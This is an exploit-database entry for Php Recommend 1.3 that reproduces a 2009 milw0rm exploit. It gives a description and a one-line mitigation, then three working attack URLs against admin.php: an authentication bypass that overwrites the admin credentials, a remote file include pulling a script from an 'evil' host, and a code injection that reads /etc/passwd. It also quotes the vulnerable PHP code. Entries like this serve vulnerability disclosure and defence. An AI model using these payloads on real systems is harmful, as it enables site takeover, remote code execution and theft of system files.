Php Recommend - exploit.company

vendor:

php_recommend

by:

scriptjunkie

7,5

CVSS

HIGH

Authentication Bypass/Remote File Include/Code Injection

20, 94, 264

CWE

Product Name: php_recommend

Affected Version From: 1.3

Affected Version To: 1.3

Patch Exists: YES

Related CWE: N/A

CPE: a:php_recommend:php_recommend

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Php Recommend <=1.3 Authentication Bypass/Remote File Include/Code Injection Exploits

Php Recommend <=1.3 is vulnerable to authentication bypass, remote file include and code injection exploits. The vulnerable code in admin.php does not check the authentication in server.php sufficiently, allowing an attacker to bypass authentication and inject malicious code.

Mitigation:

Ensure that authentication is checked sufficiently and that all user input is properly sanitized.

Source

Exploit-DB raw data:

Php Recommend <=1.3 Authentication Bypass/Remote File Include/Code Injection Exploits


Author: scriptjunkie  scriptjunkie.1 {nospam} googlemail {nospam} com
Condition: RFI:  allow_url_fopen = On
code injection: magic_quotes_gpc = Off

Exploits:
Authentication Bypass:
change admin username and password:
vulnerable.com/admin.php?submit=submit&form_admin_user=USERNAME&form_admin_pass=PASSWORD

RFI:
vulnerable.com/admin.php?submit=submit&form_include_template=http://evil/evil.php

Code Injection:
vulnerable.com/admin.php?submit=submit&form_aula=';readfile('/etc/passwd');'


Vulnerable code in "admin.php":

if($submit){
$a = "'";
$b = "<";
$c = ">";
$d = "";
$content = "".$b."?php
// Php Recommmend
// Created By Frax.dk
// GNU Licens
// Please do not delete this text
$".$d."page = '".$form_page."';
$".$d."include_template = '".$form_include_template."';
$".$d."cap = '".$form_cap."';
$".$d."title = '".$form_title."';
$".$d."aula = '".$form_aula."';
$".$d."language = '".$form_language."';
$".$d."admin_user = '".$form_admin_user."';
$".$d."admin_pass = '".$form_admin_pass."';

// -- Maincore -- //

include $".$d."include_template;
?".$c."";

$file_name = "phpre_config.php";
$file = $file_name;
$create_file = fopen($file, "w+");

if(!$create_file){die("<td><span style='color:red;'><? echo $error1; ?></span></td>\n");}

//attempt to write basic content to the file
if (fwrite($create_file, $content) === FALSE) {
echo "<td><span style='color:red;'><? echo $error2; ?></span></td>\n";
}else{echo "Succes";}
fclose($create_file);


which is reached since the authentication in server.php:
if($user == $admin_user && $admin_pass == $pass){
$error = "false";
}else{
setcookie("phpre_user", "", time()-3600);
setcookie("phpre_pass", "", time()-3600);
$error = "true";
}

is not checked sufficiently.

# milw0rm.com [2009-05-11]